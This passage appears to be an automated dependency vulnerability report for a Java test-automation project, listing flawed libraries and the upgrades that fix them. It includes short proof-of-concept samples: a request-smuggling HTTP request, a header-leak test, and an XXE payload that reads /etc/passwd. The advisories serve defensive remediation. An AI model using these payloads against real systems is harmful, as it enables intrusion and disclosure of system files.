Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.squareup.okio:okio to version 1.17.6, 3.4.0 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Unsafe Dependency Resolution

Vulnerable module: com.beust:jcommander
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › com.beust:jcommander@1.72

Overview

com.beust:jcommander is a Command line parsing framework for Java.

Affected versions of this package are vulnerable to Unsafe Dependency Resolution due to resolving dependencies over an insecure channel (http).

If the build occurred over an insecure connection, a malicious user could have perform a Man-in-the-Middle attack during the build and alter the build artifacts that were produced. In the case that any of these artifacts were compromised, any developers using them could be vulnerable.

Note: In order to validate that this artifact was not compromised, the maintainer would need to confirm that all of the artifacts published to the registry were not altered. Until this happens, we can not guarantee that this artifact was not compromised even though the probability that this happened is low.

We have chosen to alert on this issue when maintainers either decided to issue CVEs themselves, or in cases when maintainers decided against performing audits on their build to verify they had not been compromised.

Remediation

Upgrade com.beust:jcommander to version 1.75 or higher.

References

Unsafe Dependency Resolution vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.yaml:snakeyaml@1.19

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS). The Alias feature in SnakeYAML 1.18 allows entity expansion during a load operation, a related issue to CVE-2003-1564.

Note While the Maintainer acknowledges the existence of the issue, they believe it should be solved by sanitizing the inputStream to the parser

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.26 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Improper Input Validation

Vulnerable module: org.apache.httpcomponents:httpclient
Introduced through: io.rest-assured:rest-assured@4.3.1 and org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › org.apache.httpcomponents:httpclient@4.5.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.4.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › org.apache.httpcomponents:httpmime@4.5.3 › org.apache.httpcomponents:httpclient@4.5.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.4.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.apache.httpcomponents:httpmime@4.5.3 › org.apache.httpcomponents:httpclient@4.5.3

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.45.0.

Overview

org.apache.httpcomponents:httpclient is a HttpClient component of the Apache HttpComponents project.

Affected versions of this package are vulnerable to Improper Input Validation. Apache HttpClient can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.

Remediation

Upgrade org.apache.httpcomponents:httpclient to version 4.5.13 or higher.

References

Improper Input Validation vulnerability report

medium severity

Improper Handling of Length Parameter Inconsistency

Vulnerable module: org.eclipse.jetty:jetty-http
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-http@9.4.32.v20200930

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Improper Handling of Length Parameter Inconsistency via the HttpParser.java component due to accepting the + character proceeding the content-length value in a HTTP/1 header field. An attacker can use jetty in combination with a server that does not close the connection after rejecting such request and after sending a 400 response. This could result in request smuggling.

PoC

 POST / HTTP/1.1
 Host: a.com
 Content-Length: +16
 Connection: close
 
 0123456789abcdef

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.52.v20230823, 10.0.16, 11.0.16, 12.0.1 or higher.

References

Improper Handling of Length Parameter Inconsistency vulnerability report

medium severity

Information Exposure

Vulnerable module: com.squareup.okhttp3:okhttp
Introduced through: org.seleniumhq.selenium:selenium-firefox-driver@3.141.59, org.seleniumhq.selenium:selenium-java@3.141.59 and others

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@3.55.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@3.55.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0

…and 49 more

Overview

com.squareup.okhttp3:okhttp is a HTTP & HTTP/2 client for Android and Java applications

Affected versions of this package are vulnerable to Information Exposure. When there's an illegal character in a header value, an IllegalArgumentException is thrown whose message includes the full header value.

PoC

package com.launchdarkly.eventsource;

import okhttp3.*;
import org.junit.Test;
import static org.hamcrest.MatcherAssert.*;
import static org.hamcrest.Matchers.*;

public class OkhttpHeaderExceptionTest {
  @Test
  public void invalidHeaderValueIsCapturedInException() throws Exception {
    String password = "very-secret-password";
    String badValue = password + "\n";
    
    try {
      Request req = new Request.Builder().url("http://github.com/path/doesnt/matter")
          .header("Authorization", badValue)
          .build();
    } catch (IllegalArgumentException e) {
      assertThat(e.getMessage(), not(containsString(password)));
    }
  }
}

Remediation

Upgrade com.squareup.okhttp3:okhttp to version 4.9.2 or higher.

References

Information Exposure vulnerability report

medium severity

Stack-based Buffer Overflow

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.yaml:snakeyaml@1.19

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

Stack-based Buffer Overflow vulnerability report

medium severity

Heap-based Buffer Overflow

Vulnerable module: net.sourceforge.htmlunit:neko-htmlunit
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › net.sourceforge.htmlunit:neko-htmlunit@2.44.0

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.61.0.

Overview

Affected versions of this package are vulnerable to Heap-based Buffer Overflow via a crafted Processing Instruction (PI) input.

Remediation

Upgrade net.sourceforge.htmlunit:neko-htmlunit to version 2.61.0 or higher.

References

GitHub Commit

Heap-based Buffer Overflow vulnerability report

medium severity

new

EPL-1.0 license

Module: junit:junit
Introduced through: junit:junit@4.13.1 and io.cucumber:cucumber-junit@6.8.2

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › junit:junit@4.13.1
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.cucumber:cucumber-junit@6.8.2 › junit:junit@4.13.1

EPL-1.0 license

EPL-1.0 license vulnerability report

medium severity

new

MPL-2.0 license

Module: net.sourceforge.htmlunit:htmlunit-core-js
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › net.sourceforge.htmlunit:htmlunit-core-js@2.44.0

MPL-2.0 license

MPL-2.0 license vulnerability report

low severity

XML External Entity (XXE) Injection

Vulnerable module: org.eclipse.jetty:jetty-xml
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-xml@9.4.32.v20200930

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.45.0.

Overview

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection via the XmlParser when parsing Jetty’s XML configuration files by importing a (remote) malicious WAR into Jetty’s server. Exploiting this vulnerability is possible when the WAR includes a malicious web.xml.

Note:

There are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e., in order to exploit XmlParser, the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against a malicious web application, and potentially hostile web applications should only be run on isolated virtualization.

Thus this is not considered a vulnerability of the Jetty server itself, as any such usage of the Jetty XmlParser is equally vulnerable as direct usage of the JVM-supplied SAX parser. No CVE will be allocated to this advisory.

However, any direct usage of the XmlParser class by an application may be vulnerable. The impact would greatly depend on how the application uses XmlParser, but it could be a denial of service due to large entity expansion or possibly the revealing of local files if the XML results are accessible remotely.

Workaround

Users unable to upgrade to the fixed version should not use XmlParser to parse data from users.

Details

XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.

For example, below is a sample XML document, containing an XML element- username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
   <username>John</username>
</xml>

An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   <username>&xxe;</username>
</xml>

Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.

Remediation

Upgrade org.eclipse.jetty:jetty-xml to version 9.4.52.v20230823, 10.0.16, 11.0.16, 12.0.0 or higher.

References

XML External Entity (XXE) Injection vulnerability report

low severity

Information Exposure

Vulnerable module: commons-codec:commons-codec
Introduced through: io.rest-assured:rest-assured@4.3.1 and org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › org.apache.httpcomponents:httpclient@4.5.3 › commons-codec:commons-codec@1.9
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › org.apache.httpcomponents:httpmime@4.5.3 › org.apache.httpcomponents:httpclient@4.5.3 › commons-codec:commons-codec@1.9
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.apache.httpcomponents:httpmime@4.5.3 › org.apache.httpcomponents:httpclient@4.5.3 › commons-codec:commons-codec@1.9

Overview

